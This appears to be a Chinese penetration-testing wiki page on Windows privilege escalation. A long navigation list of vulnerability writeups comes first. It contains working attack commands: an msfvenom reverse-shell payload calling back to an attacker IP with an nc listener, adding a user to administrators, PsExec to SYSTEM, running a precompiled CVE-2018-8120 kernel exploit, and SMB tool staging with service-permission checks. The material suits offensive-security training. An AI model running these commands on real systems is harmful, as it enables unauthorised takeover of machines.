💻
neutron
  • Web服务器漏洞
  • test
    • Web 服务器漏洞
      • Weblogic
        • WeblogicScanner 漏洞扫描
        • CVE-2018-2628
        • CVE-2017-3506
        • CVE-2017-3248
        • CVE-2016-0638
        • CVE-2015-4852 Commons Collections
        • Weblogic SSRF漏洞 CVE-2014-4210
        • Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
        • Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
        • Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725
      • Nginx
        • Nginx越界读取缓存漏洞 CVE-2017-7529
      • Apache
        • Apache Struts2
          • About Apache Struts2
          • Struts2-Scan 漏洞验证
        • Apache Mod_jk
          • Apache Mod_jk 访问控制权限绕过 CVE-2018-11759
        • Apache Tomcat
          • Apache Tomcat 远程代码执行漏洞 CVE-2017-12615
          • Aapache Tomcat AJP 文件包含漏洞 CVE-2020-1938
          • Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935
        • Apache Shiro
          • Apache Shiro <=1.2.4反序列化漏洞 CVE-2016-4437
        • Apache Cocoon
          • Apache Cocoon XML注入 CVE-2020-11991
        • Apache Flink
          • Apache Flink <= 1.9.1(最新版本) 远程代码执行 CVE-2020-17518
          • Apache Flink 目录遍历漏洞 CVE-2020-17519
        • Apache Kylin
          • Apache Kylin Console 控制台弱口令
          • Apache Kylin的未授权配置泄露 CVE-2020-13937
          • Apache Kylin 命令注入漏洞 CVE-2020-1956
          • Apache Kylin 命令注入漏洞 CVE-2020-13925
        • Apache Solr
          • Apache Solr RCE 远程执行漏洞 CVE-2017-12629
          • Apache Solr XXE 漏洞 CVE-2017-12629
          • Apache Solr 远程执行漏洞 CVE-2019-0193
          • Apache Solr Velocity模板远程执行 CVE-2019-17558
          • Apache Solr JMX服务 RCE CVE-2019-12409
          • Apache Solr RCE 未授权上传漏洞 CVE-2020-13957
          • Apache Solr 任意文件读取漏洞
        • Apache HTTPd
          • Apache HTTPd 换行解析漏洞 CVE-2017-15715
        • Apache ActiveMQ
          • Apache ActiveMQ Console 存在默认弱口令
          • Apache ActiveMQ 反序列化漏洞 CVE-2015-5254
        • Apache ZooKeeper
          • Apache ZooKeeper 未授权访问漏洞 CVE-2014-085
        • Apache Druid
          • Apache Druid 远程代码执行漏洞 CVE-2021-25646
        • Apache OFBiz
          • Apache OFBiz rmi反序列化漏洞 CVE-2021-26295
        • Apache Zeppelin
          • Apache Zeppelin 未授权任意命令执行漏洞
      • JBoss
        • JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
        • 扫描工具JexBoss - JBoss
    • 服务器应用漏洞
      • jenkins
        • CVE-2019-1003005 远程代码执行
        • CVE-2019-1003000 远程代码执行
        • CVE-2018-1000600 Jenkins GitHub 信息泄露
        • CVE-2018-1999002 任意文件读取
        • CVE-2018-1000861 远程命令执行
        • CVE-2018-1000110 用户枚举
        • CVE-2017-1000353 Jenkins-CI 远程代码执行
        • CVE-2016-9299 代码执行
        • CVE-2016-0792 低权限用户命令执行
        • CVE-2016-0788 Jenkins CI和LTS 远程代码执行漏洞
        • CVE-2015-8103 反序列化远程代码执行
      • Redis
        • Redis <= 5.0.5 主从复制 RCE
      • OpenSSL
        • OpenSSL 心脏滴血漏洞 CVE-2014-0160
      • OpenSSH
        • OpenSSH 命令注入漏洞 CVE-2020-15778
      • Elasticsearch
        • Elasticsearch 未授权访问
      • Git
        • Git-LFS 远程命令执行漏洞 CVE-2020-27955
        • Git for Visual Studio远程执行代码漏洞 CVE-2021-21300
      • MicrosoftExchange
        • Microsoft Exchange SSRF漏洞 CVE-2021-26885
        • Microsoft Exchange 远程命令执行 CVE-2021-26855/26857/26858/27065
      • NVIDIA
        • NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056
      • QEMU
        • (待定)QEMU 虚拟机逃逸漏洞 CVE-2020-14364
      • Chrome
        • Chrome 远程命令执行漏洞
      • Saltstack
        • Saltstack 远程命令执行漏洞 CVE-2020-11651/11652
        • SaltStack 未授权访问命令执行漏洞 CVE-2020-16846/25592
      • MinIO
        • MinIO SSRF漏洞 CVE-2021-21287
      • VMware
        • VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975
        • VMware vCenter任意文件读取漏洞
      • VoIPmonitor
        • VoIPmonitor 远程命令执行漏洞 CVE-2021-30461
    • Web应用漏洞
      • 金山
        • 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞
        • 金山 V8 终端安全系统 任意文件读取漏洞
        • 金山 V8 终端安全系统 默认弱口令漏洞
      • 虚拟仿真实验室
        • 阿尔法科技 虚拟仿真实验室 未授权访问漏洞
      • 和信创天云
        • 和信创天云桌面系统 远程命令执行 RCE漏洞
      • 浪潮
        • 远程命令执行漏洞
        • 任意用户登录漏洞
        • 远程命令执行漏洞 CVE-2020-21224
      • 宝塔运维管理面板
        • 宝塔 phpmyadmin未授权访问漏洞
      • 齐治堡垒机
        • 任意用户登录漏洞
      • 思福迪堡垒机
        • 任意⽤户登录漏洞
      • 安天
        • 越权访问漏洞
      • 亿邮
        • 远程命令执行漏洞
      • 天擎
        • 前台SQL注入
        • 数据库信息泄露漏洞
      • 安美数字
        • 酒店宽带运营系统 server_ping.php 远程命令执行漏洞
      • 星锐蓝海
        • 蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
        • 蓝海卓越计费管理系统 download.php 任意文件读取漏洞
      • 墨安
        • 默安 幻阵蜜罐未授权访问 RCE
      • 银澎云计算
        • 银澎云计算 好视通视频会议系统 任意文件下载
      • 实践教学平台
        • 杭州法源软件 公证实务教学软件 SQL注入漏洞
        • 杭州法源软件 法律知识数据库系统 后台XSS漏洞
        • 杭州法源软件 法律知识数据库系统 SQL注入漏洞
      • 心理测量平台
        • 安徽阳光心健 心理测量平台 目录遍历漏洞 CNVD-2021-01929
      • 久其软件
        • 久其财务报表 download.jsp 任意文件读取漏洞
      • 图创软件
        • 图创软件 图书馆站群管理系统 任意文件读取漏洞
      • 中新金盾
        • 中新金盾信息安全管理系统 默认超级管理员密码漏洞
      • 智慧校园管理系统
        • 智慧校园管理系统 前台任意文件上传漏洞
      • 若依(RuoYi)管理系统
        • 未授权访问
        • 后台任意文件读取
      • 深信服
        • 深信服EDR远程命令执行 CNVD-2020-46552
        • 深信服 SSL VPN 客户端远程文件下载
        • 深信服 日志中心 c.php 远程命令执行漏洞
        • 深信服 行为感知系统 c.php 远程命令执行漏洞
        • 深信服后台任意用户登陆漏洞
      • 天融信
        • 天融信负载均衡TopApp-LB任意登陆
        • 天融信负载均衡TopApp-LB enable_tool_debug.php 远程命令执行漏洞
        • 天融信负载均衡TopApp-LB命令执行漏洞
        • 天融信负载均衡TopApp-LB Sql注入漏洞
        • 天融信LDP未授权访问漏洞
      • 中创视讯
        • 会捷通云视讯 list 目录文件泄露漏洞
        • 会捷通云视讯 fileDownload 任意文件读取漏洞
        • 会捷通云视讯 登录绕过漏洞
      • 亿赛通
        • 亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞
      • 极通EWEBS
        • (待定)极通EWEBS testweb.php 敏感信息泄露漏洞
        • 极通EWEBS casmain.xgi 任意文件读取漏洞
      • 汉王科技
        • 汉王人脸考勤管理系统 Check SQL注入漏洞
      • 1039家校通
        • 1039家校通 万能密码绕过 CNVD-2020-31494
        • 1039家校通 后台任意文件上传漏洞
      • TerraMaster
        • TerraMaster TOS RCE CVE-2020-28188
        • TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187
        • TerraMaster TOS 任意账号密码修改漏洞 CVE-2020-28186
        • TerraMaster TOS 用户枚举漏洞 CVE-2020-28185
        • (待定)TerraMaster TOS exportUser.php 远程命令执行
      • Panabit
        • Panabit iXCache ajax_cmd 后台命令执行漏洞
        • Panabit Panalog cmdhandle.php 后台命令执行漏洞
        • Panabit 智能应用网关 ajax_top 后台命令执行漏洞
      • E-massage
        • E-message 越权访问漏洞
      • TamronOS
        • TamronOS IPTV系统 submit 任意用户创建漏洞
        • TamronOS IPTV系统 ping 任意命令执行漏洞
      • Node-RED
        • Node-RED ui_base 任意文件读取漏洞
      • JD-FreeFuck
        • JD-FreeFuck 后台命令执行漏洞
      • H3C
        • H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞
        • H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞
        • H3C IMC dynamiccontent.properties.xhtm 存在远程命令执行
      • MessageSolution
        • MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543
      • Jupyter Notebook
        • Jupyter Notebook 未授权访问远程命令执行漏洞
      • iceWrap
        • IceWarp WebClient basic 远程命令执行漏洞
      • ICEFlow
        • ICEFlow VPN 信息泄露漏洞
      • Atlassian Jira
        • Atlassian Jira 信息泄露漏洞 CVE-2020-14181
      • Alibaba Nacos
        • Alibaba Nacos 控制台默认弱口令
        • Alibaba Nacos 未授权访问漏洞
      • Active UC
        • Active UC index.action 远程命令执行漏洞
      • Alibaba Canal
        • Alibaba Canal config 云密钥信息泄露漏洞
      • ShowDoc
        • ShowDoc 任意文件上传漏洞
      • Seo-Panel
        • Seo-Panel 4.8.0 反射型XSS漏洞 CVE-2021-3002
      • SonarQube
        • SonarQube api 信息泄露漏洞 CVE-2020-27986
      • IBOS
        • IBOS 数据库模块 任意文件上传漏洞
      • Nexus
        • Nexus Repository Manger extdirect 远程命令执行 CVE-2019-7238
        • Nexus Repository Manger group 后台远程命令执行 CVE-2020-10199
        • (待定)Nexus Repository Manger group 后台远程命令执行 CVE-2020-10204
        • Nexus Repository Manger change-password 低权限修改管理员密码漏洞 CVE-2020-11444
      • Hue
        • Hue 后台编辑器命令执行漏洞
      • Coremail
        • Coremail 配置信息泄露漏洞
      • Critix XenMobile
        • Citrix XenMobile 任意文件读取 CVE-2020-8209
      • Lanproxy
        • Lanproxy 目录遍历漏洞 CVE-2021-3019
      • JumpServer堡垒机
        • JumpServer 未授权接口 远程命令执行漏洞
      • F5 BIG-IP
        • F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986
        • F5 BIG-IP 远程代码执行漏洞 CVE-2020-5902
      • OneBlog
        • OneBlog 小于v2.2.1 远程命令执行漏洞
      • Jellyfin
        • Jellyfin 任意文件读取漏洞 CVE-2021-21402
      • GitLab
        • GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413
        • GitLab SSRF漏洞 CVE-2021-22214
      • XXL-JOB
        • XXL-JOB 任务调度中心 后台任意命令执行漏洞
        • XXL-JOB 任务调度中心 后台默认弱口令
    • 开发框架漏洞
      • fastjson
        • 1.2.24-RCE
        • 1.2.41-68 RCE
      • jQuery
        • jQuery XSS漏洞 CVE-2020-11022/11023
      • Hibernate
      • Liferay
        • Laravel <= 8.4.2 Debug模式 _ignition 远程代码执行漏洞 CVE-2021-3129
        • Laravel .env 配置文件泄露 CVE-2017-16894
      • Yii
      • Spring Boot
        • 0x02:spring cloud SnakeYAML RCE
        • 0x01:whitelabel error page SpEL RCE
      • Struts
      • Laravel
        • Laravel <= 8.4.2 Debug模式 _ignition 远程代码执行漏洞 CVE-2021-3129
        • Laravel .env 配置文件泄露 CVE-2017-16894
      • PHPUnit
        • PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841
      • Thinkphp
    • 开发语言漏洞
      • PHP zerodium后门漏洞
    • OA产品漏洞
      • 新点OA
        • 新点OA 敏感信息泄露漏洞
      • 启莱OA
        • 启莱OA messageurl.aspx SQL注入漏洞
        • 启莱OA treelist.aspx SQL注入漏洞
        • 启莱OA CloseMsg.aspx SQL注入漏洞
      • 蓝凌OA
        • 蓝凌OA EKP 后台SQL注入漏洞 CNVD-2021-01363
        • 蓝凌OA 任意文件写入漏洞
        • 蓝凌OA custom.jsp 任意文件读取漏洞
        • 蓝凌OA SSRF+JNDI远程命令执行
      • 金和OA
        • 金和OA C6 管理员默认口令
        • 金和OA C6 越权信息泄露漏洞
        • 金和OA C6 后台越权敏感文件遍历漏洞
        • 金和OA C6 download.jsp 任意文件读取漏洞
      • 泛微OA
        • 泛微云桥 e-Bridge 任意文件读取
        • 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
        • 泛微E-Cology WorkflowServiceXml RCE
        • 泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
        • 泛微OA e-cology 数据库配置信息泄漏漏洞
        • 泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705
        • 泛微OA V9 任意文件上传
        • 泛微OA V8 SQL注入漏洞
      • 通达OA
        • 通达OA部分漏洞信息整合
        • 通达OA v11.2后台任意文件上传漏洞
        • 通达OA v11.x-v11.5任意用户登录
        • 通达OA v11.6 任意文件删除&RCE
        • 通达OA v11.7后台SQL注入
        • 通达OA v11.7 在线用户登录漏洞
        • 通达OA v11.8 后台文件包含存储型XSS漏洞
        • 通达OA v11.8 后台文件包含命令执行漏洞
        • 通达OA v11.9 后台SQL注入漏洞
      • 用友OA
        • 用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923
        • 用友 NC 反序列化RCE漏洞
        • 用友 NC XbrlPersistenceServlet反序列化
        • 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
        • 用友ERP-NC 目录遍历漏洞
        • 用友 U8 OA test.jsp SQL注入漏洞
        • 用友 NCCloud FS文件管理SQL注入
      • 致远OA
        • 致远OA A6 createMysql.jsp 数据库敏感信息泄露
        • 致远OA A6 DownExcelBeanServlet 用户敏感信息泄露
        • 致远OA A6 initDataAssess.jsp 用户敏感信息泄露
        • 致远OA A6 test.jsp SQL注入漏洞
        • 致远OA A6 setextno.jsp SQL注入漏洞
        • (待定)致远OA A8 状态监控页面信息泄露
        • 致远 OA A8 htmlofficeservlet RCE漏洞 CNVD-2019-19299
        • 致远OA getSessionList.jsp Session泄漏漏洞
        • 致远OA Session泄露 任意文件上传漏洞
        • 致远OA ajax.do登录绕过 任意文件上传 CNVD-2021-01627
        • 致远OA webmail.do任意文件下载 CNVD-2020-62422
      • 帆软OA
        • 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757
        • 帆软 V9 任意文件覆盖文件上传
        • 帆软报表 2012 SSRF漏洞
        • 帆软报表 2012 信息泄露漏洞
      • 金蝶OA
        • 金蝶OA server_file 目录遍历漏洞
    • CMS漏洞
      • (待定)Drupal
      • Weiphp
        • Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693
        • Weiphp5.0 前台文件任意读取 CNVD-2020-68596
      • Discuz!X
        • Discuz!X <3.4 R20191201 后台SQL注入漏洞
      • ShopXO
        • ShopXO download 任意文件读取漏洞 CNVD-2021-15822
      • OpenSNS
        • OpenSNS shareBox 远程命令执行漏洞
      • Typesetter
        • Typesetter CMS 5-5.1 任意文件上传
      • YzmCMS
        • YzmCMS version < V5.8正式版 后台采集模块 SSRF漏洞
      • ezEIP
        • ezEIP 4.1.0 信息泄露漏洞
      • OKLite
        • OKLite 1.2.25 后台风格模块 任意文件删除 CVE-2019-16132
        • OKLite 1.2.25 后台插件安装 任意文件上传
        • OKLite 1.2.25 后台模块导入 任意文件上传 CVE-2019-16131
      • BSPHP
        • BSPHP 未授权访问 信息泄露漏洞
      • DocCMS
        • DocCMS keyword SQL注入漏洞
      • PbootCMS
        • PbootCMS ext_price SQL注入漏洞
        • PbootCMS search SQL注入漏洞
      • 发货100
        • 发货100 M_id SQL注入漏洞 CNVD-2021-30193
      • 极致CMS
        • 极致CMS 1.81以下版本 存储型XSS
        • 极致CMS_1.71_1.7_1.67版本sql注入(支付插件)
        • 极致CMS_全版本任意文件(后台)
      • 华宜互联CMS
        • 华宜互联CMS默认存在超级管理员漏洞
      • 禅道
        • 禅道 11.6版本 SQL注入漏洞
        • 禅道 11.6版本 任意文件读取漏洞
        • 禅道 11.6版本 任意文件读取漏洞
        • 禅道 小于12.4.2 文件上传漏洞 CNVD-C-2020-121325
        • 禅道 小于12.4.2 CSRF漏洞
      • 快排CMS
        • 快排CMS 信息泄露漏洞
        • 快排CMS 后台XSS漏洞
        • 快排CMS 任意文件上传漏洞
      • 狮子鱼CMS
        • 狮子鱼CMS wxapp.php 任意文件上传漏洞
        • 狮子鱼CMS image_upload.php 任意文件上传
        • 狮子鱼CMS ApigoodsController.class.php SQL注入漏洞
        • 狮子鱼CMS ApiController.class.php SQL注入漏洞
      • 原创先锋
        • 原创先锋 后台管理平台 未授权访问漏洞
    • 操作系统漏洞
      • Windows
      • Linux
        • Linux kernel权限提升漏洞 CVE-2021-3493
        • Linux sudo权限提升漏洞 CVE-2021-3156
    • 网络设备漏洞
      • 中国移动
        • 中国移动 禹路由 simple-index.asp 越权访问漏洞
        • 中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞
      • 磊科
        • 磊科 NI360路由器 认证绕过漏洞
      • 碧海威
        • 碧海威 L7多款产品 后台命令执行漏洞
      • 宏电
        • 宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152
        • 宏电 H8922 后台管理员信息泄露漏洞 CVE-2021-28151
        • 宏电 H8922 后台命令执行漏洞 CVE-2021-28150
        • 宏电 H8922 Telnet后门漏洞 CVE-2021-28149
      • 电信
        • 电信网关配置管理系统 SQL注入漏洞
        • 电信中兴ZXHN F450A网关 默认管理员账号密码漏洞
        • 电信天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞
      • 锐捷
        • 锐捷ISG 账号密码泄露漏洞
        • 锐捷NBR 1300G路由器 越权CLI命令执行漏洞
        • 锐捷EG易网关 download.php 后台任意文件读取漏洞
        • (待定)锐捷EG易网关 branch_passw.php 远程命令执行漏洞
        • 锐捷EG易网关 管理员账号密码泄露漏洞
        • 锐捷EG易网关 cli.php 远程命令执行漏洞
        • 锐捷云课堂主机 目录遍历漏洞
        • 锐捷Smartweb管理系统 密码信息泄露漏洞
        • 锐捷Smartweb管理系统 默认开启Guest账户漏洞 CNVD-2020-56167
        • 锐捷SSL VPN 越权访问漏洞
        • 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露 CNVD-2021-14536
        • 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 CNVD-2021-09650
      • 迈普
        • 迈普 ISG1000安全网关 任意文件下载漏洞
      • 佑友
        • 佑友防火墙 后台命令执行漏洞
      • 华为
        • Huawei HG659 lib 任意文件读取漏洞
      • 启明星辰
        • 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞
        • 启明星辰 天清汉马USG防火墙 弱口令漏洞
      • 飞鱼星
        • 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞
        • 飞鱼星 家用智能路由 cookie.cgi 权限绕过
      • 三星
        • 三星 WLAN AP WEA453e路由器 远程命令执行漏洞
      • 朗视
        • 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328
      • 菲力尔
        • FLIR-AX8 download.php 任意文件下载
      • 中科网威
        • 中科网威 下一代防火墙控制系统 账号密码泄露漏洞
      • 蜂网互联
        • 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313
      • TVT数码科技
        • TVT数码科技 NVMS-1000 路径遍历漏洞
      • Intelbras
        • Intelbras Wireless 未授权与密码泄露 CVE-2021-3017
      • DrayTek
        • DrayTek企业网络设备 远程命令执行 CVE-2020-8515
      • ACTI
        • ACTI 视频监控 任意文件读取漏洞
      • DVR
        • DVR 登录绕过漏洞 CVE-2018-9995
      • TP-Link
        • TP-Link SR20 远程命令执行
      • Kyan
        • Kyan 网络监控设备 run.php 远程命令执行漏洞
        • Kyan 网络监控设备 账号密码泄露漏洞
      • Cisco
        • Cisco HyperFlex HX upload 任意文件上传漏洞 CVE-2021-1499
        • Cisco HyperFlex HX storfs-asup 远程命令执行漏洞 CVE-2021-1497
        • CISCO ASA设备任意文件删除漏洞 CVE-2020-3187
        • (待定)CISCO ASA设备任意文件读取漏洞 CVE-2020-3452
      • Zyxel
        • Zyxel NBG2105 身份验证绕过 CVE-2021-3297
        • Zyxel 硬编码后门账户漏洞 CVE-2020-29583
      • SonicWall
        • SonicWall SSL-VPN 远程命令执行漏洞
      • KEDACOM
        • KEDACOM 数字系统接入网关 任意文件读取漏洞
      • H3C
        • (待定)H3C HG659 lib 任意文件读取
        • H3C SecPath 下一代防火墙 任意文件下载漏洞
      • rConfig
        • rConfig ajaxArchiveFiles.php 后台远程命令执行漏洞
        • rConfig userprocess.php 任意用户创建漏洞
        • (待定)rConfig ajaxEditTemplate.php 后台远程命令执行漏洞
        • rConfig useradmin.inc.php 信息泄露漏洞
      • D-Link
        • D-Link DSR-250N 万能密码漏洞
        • D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞
        • D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078
        • D-Link AC管理系统默认账号密码
        • D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506
        • D-Link DSL-28881A 信息泄露 CVE-2020-24577
        • D-Link DSL-28881A FTP配置错误 CVE-2020-24578
        • D-Link DSL-28881A 未授权访问 CVE-2020-24579
        • D-Link DSL-28881A 远程命令执行 CVE-2020-24581
      • HIKVISION
        • HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544
        • HIKVISION 视频编码设备接入网关 任意文件下载
      • Sapido
        • Sapido多款路由器命令执行漏洞
      • iKuai
        • iKuai 流控路由 SQL注入漏洞
      • ZeroShell
        • ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725
      • JCG
        • JCG JHR-N835R 后台命令执行漏洞
      • DD-WRT
        • DD-WRT UPNP缓冲区溢出漏洞 CVE-2021-27137
      • MagicFlow
        • MagicFlow 防火墙网关 main.xp 任意文件读取漏洞
      • WayOS
        • Wayos 防火墙 后台命令执行漏洞
        • Wayos 防火墙 账号密码泄露漏洞
        • Wayos AC集中管理系统默认弱口令 CNVD-2021-00876
  • PHP代码审计
    • PHP函数缺陷和安全问题
    • 审计总结
    • PHP自动化代码审计技术
  • 内网渗透
    • 浅谈几个 Windows 错误配置利用的方法
    • dnscat2 使用
    • SSH 隧道使用学习
    • 两种突破内网中无法上传大文件的方法
    • 密码抓取
    • 域内主机端口探测总结
    • 域内主机存活探测总结
    • 破解与执行
    • 提权&获得令牌
    • 漏洞发现&组策略凭证
    • 内网穿透工具
    • 工具原理及使用
    • 基础概念及信息收集
  • Android
    • Untitled
    • Untitled
  • CS工具使用
    • Untitled
    • Untitled
    • Untitled
    • Untitled
    • Untitled
  • 提权
    • Linux提权
    • Windows提权
  • 信息收集
Powered by GitBook
On this page
  • 0x01 一般概念
  • 前言
  • 用户帐户
  • 服务帐户
  • 组
  • 资源
  • ACLs & ACEs
  • 0x02 管理员权限
  • msfvenom
  • RDP
  • Administrator-->System
  • 0x03 工具使用
  • 前言
  • Powerup&Sharpup
  • Powerup
  • SharpUp
  • Seatbelt
  • winPEAS
  • accesschk.exe
  • 0x04 内核漏洞
  • 前言
  • 查找和使用内核漏洞:
  • 工具
  • 实操
  • 0x05 服务漏洞
  • 前言
  • 基本命令
  • 服务配置错误
  • 0x06 注册表
  • 前言
  • 实操
  • 0x07始终安装相关
  • 前言
  • 实操
  • 0x08密码
  • 前言
  • 注册表
  • 实操
  • 信用
  • 配置文件
  • SAM
  • SAM/SYSTEM Locations
  • Hash
  • 0x09Scheduled Tasks
  • 预定任务
  • 基本命令
  • 实操
  • 不安全的 GUI 应用程序
  • 0x10启动应用程序
  • 前言
  • 实操
  • 0x11已安装的应用程序
  • 前言
  • 基本命令
  • 0x12Hot Potato
  • Rotten Potato
  • SeImpersonate / SeAssignPrimaryToken
  • Juicy Potato(烂土豆)
  • Rogue Potato
  • PrintSpoofer
  • 端口转发
  • getsystem(命名管道和令牌复制)
  • 用户权限

Was this helpful?

  1. 提权

Windows提权

0x01 一般概念

前言

我们在 Windows 中实现特权升级的最终目标是获得作为管理员或系统用户运行的权限

提权的关键是需要对受破坏的系统进行大量的信息搜集。

在很多情况下,提权可能不只是依赖于单一的错误配置,而是可能合并多个错误配置

所有特权升级实际上是违反访问控制的示例。

访问控制和用户权限是内在联系的。

在关注 Windows 中的权限升级时,了解 Windows 如何处理权限 非常重要

用户帐户

用户帐户用于登录 Windows 系统。

将用户帐户视为受制于唯一身份的设置/首选项集合。

本地"管理员"帐户默认在安装时创建。

根据 Windows 的版本,可能会存在其他几个默认用户帐户,像Guest

服务帐户

服务帐户(有些明显)用于在 Windows 中运行服务。

服务帐户不能用于登录 Windows 系统。

系统帐户是一个默认服务帐户,具有 Windows 中任何本地帐户的最高权限。

其他默认服务帐户包括网络服务和本地服务。

组

用户帐户可以属于多个组,组可以拥有多个用户。

组允许更轻松地访问资源。

常规 组 (如 管理员、 用户) 有 一组成员列表。

伪组(例如 "已验证 的用户")有 一个动态成员列表,这些成员会根据某些交互进行更改。

资源

在Windows中,有多种类型的资源(也称为对象):

Files / Directories

Registry Entries

Services

用户 and/or 组是否具有执行特定操作的权限依赖于资源的访问控制列表(ACL)

ACLs & ACEs

访问 Windows 中某些资源的权限由该资源的访问控制列表 (ACL) 控制

每个 ACL 由零或更多访问控制条目(ACEs)组成

每个ACE定义了一个主体(例如用户、组)和特定的访问权限。

0x02 管理员权限

msfvenom

如果我们可以使用管理员权限

那么我们可以进行执行msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.175.130 LPORT=4444 -f exe -o a001.exe

使用nc监听 进行反弹shell

RDP

如果RDP可用(或者我们可以启用它),我们可以将我们的低权限用户添加到管理员组,然后生成一个管理员命令

通过GUI提示

net localgroup administrators <username /add

Administrator-->System

要从管理用户升级到完全系统权限,可以使用Windows系统内部使用PsExec工具

https://docs.microsoft.com/en

.\PsExec64.exe -accepteula -i -s C:\Users\user\Desktop\a002.exe

0x03 工具使用

前言

主要使用

winPEAS and Seatbelt

Powerup&Sharpup

PowerUp: https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

SharpUp: https://github.com/GhostPack/SharpUp

预编译的SharpUp: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe

Powerup

要运行PowerUp,请启动PowerShell会话并使用dot加载脚本,请执行以下操作:

PS. .\PowerUp.ps1

运行Invoke AllChecks函数开始检查

常见的特权升级错误配置。

PS Invoke-AllChecks

SharpUp

要运行SharpUp,请启动命令提示符并运行可执行文件:

\ .\SharpUp.exe

与PowerUp一样的配置

Seatbelt

Seatbelt是一种枚举工具。它包含许多枚举检查。

它不会主动寻找特权升级错误配置,但是可以为进一步调查提供相关信息。

代码: https://github.com/GhostPack/Seatbelt

预编译: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Seatbelt.exe

运行所有检查并筛选出不重要的结果:

.\Seatbelt.exe all

要运行特定检查:

.\Seatbelt.exe <check <check

winPEAS

winPEAS是一个非常强大的工具,它不仅积极寻找特权升级错误配置,而且还在结果中为用户突出显示它们。

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

在运行之前,我们需要添加一个注册表项,然后重新打开命令提示:

reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

运行所有检查,同时避免耗时的搜索:

.\winPEASany.exe quiet cmd fast

运行特定检查类别:

.\winPEASany.exe quiet cmd systeminfo

accesschk.exe

accesschk是一个很旧的工具了,但我们依然可以尝试去用

您可以使用它来检查用户或组是否有权访问文件,目录,服务和注册表项

缺点是:程序的最新版本会生成一个GUI"接受EULA"弹出窗口。

当使用命令行时,我们有 使用仍具有/accepteula命令行的旧版本选项

0x04 内核漏洞

前言

内核是任何操作系统的核心。将其视为应用程序软件和实际计算机硬件之间的一层。

内核对操作系统有完全的控制。利用内核漏洞可导致作为系统用户执行。

查找和使用内核漏洞:

1. 列举Windows版本/修补程序/级别(Systeminfo)

2. 查找匹配的漏洞:Google、ExploitDB、GitHub

3. 编译并运行。

建议最后使用 因为使用 会导致宕机

工具

Tools Windows Exploit Suggester: https://github.com/bitsadmin/wesng

Precompiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits 这个

Watson: https://github.com/rasta-mouse/Watson

实操

提取systeminfo命令的输出:

systeminfo  1.txt

2.运行wesng查找潜在漏洞:

https://github.com/lowliness9/wesng

python wes.py 1.txt -i 'Elevation of Privilege' --exploits-only | less

3.已编译漏洞的交叉引用结果:

https://github.com/SecWiki/windows-kernel-exploits

4.漏洞利用

https://github.com/SecWiki/windows-kernel-exploits/blob/master/CVE-2018-8120/x64.exe

5.系统权限

kali上启动nc监听 拿到系统权限

x64.exe C:\Users\dayu\Desktop\a002.exe

0x05 服务漏洞

前言

服务只是在后台运行、接受输入或执行常规任务的程序。

如果服务使用系统权限运行并配置错误,则利用它们也可能导致具有系统权限的命令执行

基本命令

查询服务的配置:

sc.exe qc <name>

查询服务的当前状态:

sc.exe query <name

修改服务的配置选项:

sc.exe config <name <option= <value

开始/停止服务:

net start/stop <name>

服务配置错误

1.不安全的服务权限

前言

每个服务都有 ACL,定义某些特定于服务的权限。

有些权限是无害的(例如服务查询配置,服务查询状态)

有些可能有用(例如, 服务停止,服务启动 )

有些是危险的(例如,服务更改配置,服务所有访问)

如果我们的用户有权更改具有系统特权的服务的配置,我们可以将服务使用的可执行项更改为我们自己的服务之一。

但是这里要注意:如果可以更改服务配置,但无法停止/启动服务,则依然可能是无法提权的

实操

1.SMB Server进行上传winPEASany.exe

python smbserver.py a001 /var/www/html/
copy \\192.168.175.130\a001\winPEASany.exe winPEASany.exe

2. 运行winPEAS以检查服务配置错误:

.\winPEASany.exe quiet servicesinfo

3. 可以修改"daclsvc"服务。

4. 我们可以用accesschk.exe来确认这一点:

使用它来检查用户或组是否有权访问文件,目录,服务和注册表项

.\accesschk.exe /accepteula -uwcqv user daclsvc
